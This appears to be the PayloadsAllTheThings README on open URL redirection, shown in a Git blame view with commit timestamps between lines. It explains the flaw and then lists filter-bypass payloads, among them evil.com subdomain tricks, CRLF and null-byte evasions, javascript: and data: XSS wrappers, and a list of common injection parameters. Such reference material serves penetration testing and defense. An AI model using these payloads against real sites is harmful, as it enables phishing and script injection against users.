PayloadsAllTheThings/Open Redirect/README.md

202 lines
7.8 KiB
Markdown
Raw Normal View History

2016-10-18 08:41:18 +00:00
# Open URL Redirection
2018-08-12 21:30:22 +00:00
2022-08-09 09:02:21 +00:00
> Un-validated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Un-validated redirect and forward attacks can also be used to maliciously craft a URL that would pass the applications access control check and then forward the attacker to privileged functions that they would normally not be able to access.
2016-10-18 08:01:56 +00:00
2018-12-29 12:05:29 +00:00
## Summary
* [Methodology](#methodology)
* [HTTP Redirection Status Code](#http-redirection-status-code)
* [Fuzzing](#fuzzing)
* [Filter Bypass](#filter-bypass)
* [Common injection parameters](#common-injection-parameters)
* [Labs](#labs)
2023-07-08 08:09:59 +00:00
* [References](#references)
## Methodology
2018-12-29 12:05:29 +00:00
2023-07-08 08:09:59 +00:00
An open redirect vulnerability occurs when a web application or server uses unvalidated, user-supplied input to redirect users to other sites. This can allow an attacker to craft a link to the vulnerable site which redirects to a malicious site of their choosing.
2018-12-29 12:05:29 +00:00
2023-07-08 08:09:59 +00:00
Attackers can leverage this vulnerability in phishing campaigns, session theft, or forcing a user to perform an action without their consent.
2018-12-29 12:05:29 +00:00
2023-07-08 08:09:59 +00:00
Consider this example:
Your web application has a feature that allows users to click on a link and be automatically redirected to a saved preferred homepage. This might be implemented like so:
```ps1
https://example.com/redirect?url=https://userpreferredsite.com
2018-12-29 12:05:29 +00:00
```
2023-07-08 08:09:59 +00:00
An attacker could exploit an open redirect here by replacing the `userpreferredsite.com` with a link to a malicious website. They could then distribute this link in a phishing email or on another website. When users click the link, they're taken to the malicious website.
## HTTP Redirection Status Code
2018-12-29 12:05:29 +00:00
2023-07-08 08:09:59 +00:00
HTTP Redirection status codes, those starting with 3, indicate that the client must take additional action to complete the request. Here are some of the most common ones:
2018-12-29 12:05:29 +00:00
2023-07-08 08:09:59 +00:00
- [300 Multiple Choices](https://httpstatuses.com/300) - This indicates that the request has more than one possible response. The client should choose one of them.
- [301 Moved Permanently](https://httpstatuses.com/301) - This means that the resource requested has been permanently moved to the URL given by the Location headers. All future requests should use the new URI.
- [302 Found](https://httpstatuses.com/302) - This response code means that the resource requested has been temporarily moved to the URL given by the Location headers. Unlike 301, it does not mean that the resource has been permanently moved, just that it is temporarily located somewhere else.
- [303 See Other](https://httpstatuses.com/303) - The server sends this response to direct the client to get the requested resource at another URI with a GET request.
- [304 Not Modified](https://httpstatuses.com/304) - This is used for caching purposes. It tells the client that the response has not been modified, so the client can continue to use the same cached version of the response.
- [305 Use Proxy](https://httpstatuses.com/305) - The requested resource must be accessed through a proxy provided in the Location header.
- [307 Temporary Redirect](https://httpstatuses.com/307) - This means that the resource requested has been temporarily moved to the URL given by the Location headers, and future requests should still use the original URI.
- [308 Permanent Redirect](https://httpstatuses.com/308) - This means the resource has been permanently moved to the URL given by the Location headers, and future requests should use the new URI. It is similar to 301 but does not allow the HTTP method to change.
2018-12-29 12:05:29 +00:00
2017-07-06 19:02:19 +00:00
## Fuzzing
2018-08-12 21:30:22 +00:00
2023-07-08 08:09:59 +00:00
Replace `www.whitelisteddomain.tld` from *Open-Redirect-payloads.txt* with a specific white listed domain in your test case
2017-07-06 19:02:19 +00:00
2023-07-08 08:09:59 +00:00
To do this simply modify the `WHITELISTEDDOMAIN` with value `www.test.com `to your test case URL.
2018-08-12 21:30:22 +00:00
```powershell
2017-07-06 19:02:19 +00:00
WHITELISTEDDOMAIN="www.test.com" && sed 's/www.whitelisteddomain.tld/'"$WHITELISTEDDOMAIN"'/' Open-Redirect-payloads.txt > Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt && echo "$WHITELISTEDDOMAIN" | awk -F. '{print "https://"$0"."$NF}' >> Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt
```
2023-07-08 08:09:59 +00:00
2018-12-29 12:05:29 +00:00
## Filter Bypass
2018-08-12 21:30:22 +00:00
Using a whitelisted domain or keyword
2018-08-12 21:30:22 +00:00
```powershell
www.whitelisted.com.evil.com redirect to evil.com
```
2016-10-18 08:01:56 +00:00
2016-10-18 08:41:18 +00:00
Using CRLF to bypass "javascript" blacklisted keyword
2018-08-12 21:30:22 +00:00
```powershell
2016-10-18 08:41:18 +00:00
java%0d%0ascript%0d%0a:alert(0)
2016-10-18 08:01:56 +00:00
```
2021-10-01 08:12:12 +00:00
Using "//" & "////" to bypass "http" blacklisted keyword
2018-08-12 21:30:22 +00:00
```powershell
2016-10-18 08:41:18 +00:00
//google.com
2021-10-01 08:12:12 +00:00
////google.com
2016-10-18 08:41:18 +00:00
```
Using "https:" to bypass "//" blacklisted keyword
2018-08-12 21:30:22 +00:00
```powershell
2016-10-18 08:41:18 +00:00
https:google.com
```
Using "\/\/" to bypass "//" blacklisted keyword (Browsers see \/\/ as //)
2018-08-12 21:30:22 +00:00
```powershell
2016-10-18 08:41:18 +00:00
\/\/google.com/
2017-07-06 19:02:19 +00:00
/\/google.com/
2016-10-18 08:41:18 +00:00
```
Using "%E3%80%82" to bypass "." blacklisted character
2018-08-12 21:30:22 +00:00
```powershell
/?redir=google。com
2016-10-18 08:41:18 +00:00
//google%E3%80%82com
```
Using null byte "%00" to bypass blacklist filter
2018-08-12 21:30:22 +00:00
```powershell
2016-10-18 08:41:18 +00:00
//google%00.com
```
Using parameter pollution
```powershell
?next=whitelisted.com&next=google.com
```
2016-10-18 08:41:18 +00:00
Using "@" character, browser will redirect to anything after the "@"
2018-08-12 21:30:22 +00:00
```powershell
2016-10-18 08:41:18 +00:00
http://www.theirsite.com@yoursite.com/
```
Creating folder as their domain
2018-08-12 21:30:22 +00:00
```powershell
2016-10-18 08:41:18 +00:00
http://www.yoursite.com/http://www.theirsite.com/
http://www.yoursite.com/folder/www.folder.com
```
2024-09-16 16:05:54 +00:00
Using "`?`" character, browser will translate it to "`/?`"
2020-11-26 15:43:10 +00:00
```powershell
http://www.yoursite.com?http://www.theirsite.com/
http://www.yoursite.com?folder/www.folder.com
```
Host/Split Unicode Normalization
2024-09-16 16:05:54 +00:00
```powershell
https://evil.c℀.example.com . ---> https://evil.ca/c.example.com
http://a.comX.b.com
```
2016-10-18 08:41:18 +00:00
XSS from Open URL - If it's in a JS variable
2018-08-12 21:30:22 +00:00
```powershell
2016-10-18 08:41:18 +00:00
";alert(0);//
```
XSS from data:// wrapper
2018-08-12 21:30:22 +00:00
```powershell
2016-10-18 08:41:18 +00:00
http://www.example.com/redirect.php?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
```
XSS from javascript:// wrapper
2018-08-12 21:30:22 +00:00
```powershell
2016-10-18 08:41:18 +00:00
http://www.example.com/redirect.php?url=javascript:prompt(1)
```
2023-07-08 08:09:59 +00:00
## Common injection parameters
```powershell
/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
```
2022-10-02 06:13:01 +00:00
## Labs
* [Root Me - HTTP - Open redirect](https://www.root-me.org/fr/Challenges/Web-Serveur/HTTP-Open-redirect)
* [PortSwigger - DOM-based open redirection](https://portswigger.net/web-security/dom-based/open-redirection/lab-dom-open-redirection)
2018-12-24 14:02:50 +00:00
## References
2018-08-12 21:30:22 +00:00
- [Host/Split Exploitable Antipatterns in Unicode Normalization - Jonathan Birch - August 3, 2019](https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization.pdf)
- [Open Redirect Cheat Sheet - PentesterLand - November 2, 2018](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)
- [Open Redirect Vulnerability - s0cket7 - August 15, 2018](https://s0cket7.com/open-redirect-vulnerability/)
- [Open-Redirect-Payloads - Predrag Cujanović - April 24, 2017](https://github.com/cujanovic/Open-Redirect-Payloads)
- [Unvalidated Redirects and Forwards Cheat Sheet - OWASP - February 28, 2024](https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet)
- [You do not need to run 80 reconnaissance tools to get access to user accounts - Stefano Vettorazzi (@stefanocoding) - May 16, 2019](https://gist.github.com/stefanocoding/8cdc8acf5253725992432dedb1c9c781)